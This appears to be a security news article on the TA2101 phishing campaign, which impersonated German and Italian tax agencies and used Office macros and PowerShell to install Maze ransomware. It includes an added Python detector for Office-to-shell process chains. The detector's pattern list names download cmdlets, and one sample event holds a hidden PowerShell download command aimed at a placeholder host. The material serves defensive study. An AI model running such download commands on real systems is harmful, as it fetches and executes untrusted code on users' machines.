TA2101 Exploiting Windows Using MS Office


Recently a group of researchers detected a new malware campaign, TA2101, that is targeting German and Italian companies to deploy and install malware in their networks.

The actor started impersonating the Bundeszentralamt für Steuern, the current German Federal Ministry of Finance, with a look-alike domain, headers and stolen branding in its emails. The group used licensed penetration-testing tools and frameworks such as Cobalt Strike and Metasploit to perform post-exploitation tasks. Such tools and frameworks are normally used by organizations to find vulnerabilities within their own networks, and they are also used as simulation tools to penetrate a network. Various actors, including Cobalt, APT32 and APT19, have deployed and executed various malware.

Researchers also observed this actor distributing the well-known Maze ransomware using the same social engineering techniques while targeting the Italian revenue agency, Agenzia delle Entrate.

Between 16 October and 12 November this year, researchers observed the actor sending malicious emails to government, IT, manufacturing and healthcare officials in Germany and Italy.

On 16 October 2019, hundreds of emails attempted to deliver malware through attached malicious Microsoft Office documents, impersonating the Bundeszentralamt für Steuern and using attractive, tailored lure messages.

The lure message states that a 2019 tax refund of 694,32 euros is outstanding and that the recipient should apply for the refund using the attached Microsoft document within 3 days.

Once the attached Microsoft document is opened, it runs a macro that executes a PowerShell script, which downloads and installs the Maze ransomware on the victim's system.
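The chain just described (Office document, macro, PowerShell, download) leaves a distinctive trace in endpoint process-creation logs: an Office host process spawning a shell whose command line reaches out to the network. The following detector is an added example written for this article, not code from the original post or from the researchers who reported the campaign. The event records, field names (Sysmon-style `ParentImage`, `Image`, `CommandLine`) and the placeholder URL are all constructed assumptions; adapt the field names to your own telemetry.

```python
"""Flag Office -> shell -> download chains in process-creation events.

Added example for this article; not the original post's code.
Event field names are assumed to follow Sysmon Event ID 1 naming.
"""
import re
from typing import Dict, List, Optional

# Office host processes from which a malicious macro would spawn a child.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script and shell hosts commonly launched by macros.
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                  "cscript.exe", "mshta.exe"}

# Command-line fragments that indicate a network download or an encoded command.
DOWNLOAD_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"invoke-webrequest", r"\biwr\b", r"downloadstring", r"downloadfile",
        r"net\.webclient", r"start-bitstransfer", r"\bcurl\b", r"\bwget\b",
        r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}",
    )
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return 'high' or 'medium' for a suspicious Office->shell event, else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
        return None
    cmdline = event.get("CommandLine", "")
    if any(p.search(cmdline) for p in DOWNLOAD_PATTERNS):
        return "high"    # Office spawned a shell that fetches something remote
    return "medium"      # Office spawning any shell is rare enough to review


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run classify() over a batch of events and collect the alerts in order."""
    alerts = []
    for ev in events:
        severity = classify(ev)
        if severity:
            alerts.append({
                "severity": severity,
                "host": ev.get("Computer", "?"),
                "user": ev.get("User", "?"),
                "parent": basename(ev.get("ParentImage", "")),
                "child": basename(ev.get("Image", "")),
                "cmdline": ev.get("CommandLine", ""),
            })
    return alerts


# Constructed sample events (not real telemetry). The URL is a placeholder.
SAMPLE_EVENTS = [
    {"Computer": "FIN-WS-07", "User": "CORP\\jdoe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -Command "Invoke-WebRequest '
                    r'http://example.invalid/refund -OutFile $env:TEMP\refund.exe"'},
    {"Computer": "IT-WS-02", "User": "CORP\\admin",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process"},            # benign: not from Office
    {"Computer": "FIN-WS-09", "User": "CORP\\msmith",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir C:\\Users"},              # review: Office -> shell
    {"Computer": "FIN-WS-07", "User": "CORP\\jdoe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 12288"},                    # benign: print helper
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert['severity'].upper()}] {alert['host']} {alert['user']}: "
              f"{alert['parent']} -> {alert['child']} :: {alert['cmdline']}")
```

Run against the constructed sample, the first event is reported as high severity (Word launching PowerShell with a download cmdlet), the Excel-to-cmd event is reported as medium for review, and the two benign events are ignored. In production this logic belongs in the SIEM or EDR rule engine, and the medium tier will need an allow-list for legitimate add-ins that spawn scripts.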

On 29 October of the same year, an impersonating email was sent to Italy's financial department.

These emails were sent from .icu domains, and the domains' SOA records shared the identical contact email address.

Masked email used for German officials: [email protected]

Masked email used for Italian Officials: [email protected]

“Financial-related impersonations used – using phishing emails, campaigns and drama in different geographical locations”
